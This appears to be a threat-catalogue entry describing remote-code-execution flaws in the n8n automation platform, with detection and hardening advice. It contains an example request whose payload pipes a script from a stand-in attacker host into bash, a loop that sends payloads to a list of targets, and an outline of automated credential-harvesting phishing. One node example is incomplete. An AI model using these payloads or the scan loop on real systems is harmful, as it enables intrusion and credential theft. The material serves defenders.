n8n Workflow Automation
Vendor
n8n.io
Category
Autonomous Agent
Privilege Level
User
Version
Latest
Capabilities
- Server-side expression evaluation
- Workflow automation (400+ integrations)
- Terminal command execution
- File system operations
- API integrations (AWS, Google, Slack, etc.)
- Form submissions without authentication
Description
n8n is a popular AI workflow automation platform with over 100 million Docker pulls. It enables building automated workflows through nodes, integrating AI agents with hundreds of services. Two critical RCE vulnerabilities make it one of the most dangerous AI agent platforms currently deployed.
Attack Vectors
1. Ni8mare - Unauthenticated RCE
MITRE ATT&CK: T1190 - Exploit Public-Facing Application
CVE: CVE-2026-21858
CVSS: 10.0 (Critical)
Worst-case scenario vulnerability allowing unauthenticated remote attacker to gain full administrative control.
POST /form/test HTTP/1.1
Host: vulnerable-n8n.com
Content-Type: application/json
{
"data": {
"malicious_payload": "$(curl https://attacker.com/shell.sh | bash)"
}
}
Attack Flow:
- Attacker submits malicious form data
- Content-type confusion bug triggered
- Authentication bypass achieved
- Full admin access obtained
- Database encryption key extracted
- Arbitrary code execution
2. Authenticated Expression Injection
MITRE ATT&CK: T1059
CVE: CVE-2025-68613
CVSS: 9.9 (Critical)
Expression evaluation engine allows authenticated attackers to achieve RCE.
// Malicious workflow node
{
"nodes": [{
"type": "Set",
"parameters": {
"values": {
"string": [
{
"name": "result",
"value": "="
}
]
}
}
}]
}
3. Form-Based RCE
MITRE ATT&CK: T1210
Forms can be submitted without authentication, enabling mass exploitation.
# Automated exploitation
for target in $(cat targets.txt); do
curl -X POST "https://$target/form/test" \
-H "Content-Type: application/json" \
-d '{"data": {"cmd": "$(malicious_payload)"}}'
done
4. AI-Powered Social Engineering
MITRE ATT&CK: T1566
n8n workflows can automate phishing campaigns at scale.
Workflow:
1. AI scrapes target information
2. Generates personalized emails
3. Tracks opens/clicks
4. Harvests credentials via fake forms
5. Exfiltrates to attacker
Detection
Network Monitoring
# Monitor for suspicious form submissions
tcpdump -i any -s 0 -w n8n.pcap 'port 5678'
# Look for command injection patterns
grep -r "execSync\|spawn\|exec" /var/log/n8n/
Application Logs
~/.n8n/logs/
/var/log/n8n/
Docker container logs
Behavioral Indicators
- Unusual form submissions
- Expression evaluation errors
- Unexpected child processes
- Outbound connections to unknown hosts
- Database access anomalies
Prevention
Immediate Actions
1. Update Immediately
# Docker
docker pull n8nio/n8n:1.121.0
# npm
npm update n8n -g
2. Require Authentication for Forms
// n8n settings
{
"forms": {
"requireAuth": true,
"allowPublic": false
}
}
3. Network Restrictions
# Firewall rules
iptables -A INPUT -p tcp --dport 5678 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 5678 -j DROP
# Don't expose to internet
Long-Term Mitigations
1. Expression Sandboxing
// Restrict dangerous functions
{
"executions": {
"maxExpressionDepth": 10,
"blacklistFunctions": [
"require",
"process",
"child_process",
"fs"
]
}
}
2. Input Validation
// Validate all form inputs
function validateInput(data) {
const dangerous = /[;&|`$(){}[\]<>]/;
if (dangerous.test(JSON.stringify(data))) {
throw new Error("Malicious input detected");
}
}
3. Network Segmentation
- Run n8n in isolated network
- Use VPN for access
- Implement WAF rules
- Monitor all traffic
4. Audit Logging
{
"logging": {
"level": "debug",
"auditLog": true,
"expressionEvaluation": true,
"fileAccess": true
}
}
Artifacts
Configuration Files
~/.n8n/
~/.n8n/config/
/root/.n8n/
Database
~/.n8n/database.sqlite
PostgreSQL: n8n database
Logs
~/.n8n/logs/
/var/log/n8n/
Docker: docker logs n8n
Docker Compose
/docker-compose.yml
/n8n-docker-compose.yml